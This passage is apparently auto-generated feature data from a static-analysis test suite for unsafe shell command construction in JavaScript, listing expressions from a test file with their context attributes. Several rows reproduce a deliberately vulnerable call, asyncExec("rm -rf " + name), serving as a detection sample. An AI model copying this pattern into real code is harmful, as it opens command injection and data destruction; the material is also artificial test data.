name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:3:447:29 | asyncEx ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:3:447:29 | asyncEx ... + name) | enclosingFunctionBody | name asyncExec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:3:447:29 | asyncEx ... + name) | enclosingFunctionName | myFunc | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:3:447:29 | asyncEx ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:3:447:29 | exceptional return of asyncEx ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:3:447:29 | exceptional return of asyncEx ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:3:447:29 | exceptional return of asyncEx ... + name) | enclosingFunctionBody | name asyncExec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:3:447:29 | exceptional return of asyncEx ... + name) | enclosingFunctionName | myFunc | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:3:447:29 | exceptional return of asyncEx ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:13:447:21 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:13:447:21 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:13:447:21 | "rm -rf " | enclosingFunctionBody | name asyncExec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:13:447:21 | "rm -rf " | enclosingFunctionName | myFunc | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:13:447:21 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:13:447:21 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:13:447:28 | "rm -rf " + name | CalleeFlexibleAccessPath | asyncExec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:13:447:28 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:13:447:28 | "rm -rf " + name | calleeImports | async-execute | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:13:447:28 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:13:447:28 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:13:447:28 | "rm -rf " + name | enclosingFunctionBody | name asyncExec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:13:447:28 | "rm -rf " + name | enclosingFunctionName | myFunc | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:13:447:28 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:25:447:28 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:25:447:28 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:25:447:28 | name | enclosingFunctionBody | name asyncExec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:25:447:28 | name | enclosingFunctionName | myFunc | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:25:447:28 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:25:447:28 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:451:1:451:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:451:1:451:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:451:1:451:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:451:1:451:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:451:1:451:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:451:1:451:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:451:1:451:22 | module. ... blabity | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:451:1:451:22 | module. ... blabity | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:451:1:451:22 | module. ... blabity | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:451:1:451:27 | module. ... ty = {} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:451:1:451:27 | module. ... ty = {} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:451:1:451:27 | module. ... ty = {} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:451:8:451:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:451:8:451:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:451:8:451:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:451:16:451:22 | blabity | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:451:16:451:22 | blabity | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:451:16:451:22 | blabity | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:451:26:451:27 | {} | assignedToPropName | blabity | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:451:26:451:27 | {} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:451:26:451:27 | {} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:451:26:451:27 | {} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:453:1:453:6 | Object | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:453:1:453:6 | Object | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:453:1:453:6 | Object | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:453:1:453:23 | Object. ... perties | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:453:1:453:23 | Object. ... perties | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:453:1:453:23 | Object. ... perties | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:453:1:470:1 | Object. ... \\t)\\n\\t)\\n) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:453:1:470:1 | Object. ... \\t)\\n\\t)\\n) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:453:1:470:1 | Object. ... \\t)\\n\\t)\\n) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:453:1:470:1 | exceptional return of Object. ... \\t)\\n\\t)\\n) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:453:1:470:1 | exceptional return of Object. ... \\t)\\n\\t)\\n) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:453:1:470:1 | exceptional return of Object. ... \\t)\\n\\t)\\n) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:453:8:453:23 | defineProperties | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:453:8:453:23 | defineProperties | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:453:8:453:23 | defineProperties | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path 